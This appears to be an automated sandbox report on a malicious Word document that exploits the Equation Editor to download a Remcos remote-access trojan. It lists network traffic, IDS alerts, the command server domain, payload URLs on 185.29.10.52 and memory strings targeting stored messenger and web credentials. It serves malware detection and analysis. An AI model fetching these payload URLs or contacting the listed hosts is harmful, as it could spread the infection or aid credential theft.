                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162

                  Networking

                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 192.210.150.29:14645
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 192.210.150.29:14645
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49168 -> 192.210.150.29:14645
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49169 -> 192.210.150.29:14645
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.29.10.52:80 -> 192.168.2.22:49163
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.29.10.52:80 -> 192.168.2.22:49163
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49167 -> 192.210.150.29:14645
                  Source: Malware configuration extractor | URLs: authurremc.duckdns.org
                  Source: unknown | DNS query: name: authurremc.duckdns.org
                  Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /550/RGBV.txt HTTP/1.1 Host: 185.29.10.52 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                  Source: Joe Sandbox View | IP Address: 192.210.150.29 192.210.150.29
                  Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox View | ASN Name: DATACLUB-SE DATACLUB-SE
                  Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global traffic | HTTP traffic detected: GET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.29.10.52 Connection: Keep-Alive
                  Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{679FD92C-7EF1-4A2F-ADE8-27F26CF6740E}.tmp
                  Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.29.10.52 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /550/RGBV.txt HTTP/1.1 Host: 185.29.10.52 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: global traffic | DNS traffic detected: DNS query: authurremc.duckdns.org
                  Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.29.10.52
                  Source: powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.29.10.52/550/RGBV.txt
                  Source: EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIF
                  Source: EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4
                  Source: EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFj
                  Source: EQNEDT32.EXE, 00000002.00000003.360658703.00000000005AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC:
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhvB683.tmp.13.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhvB683.tmp.13.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000006.00000002.386327941.000000000269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382702035.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
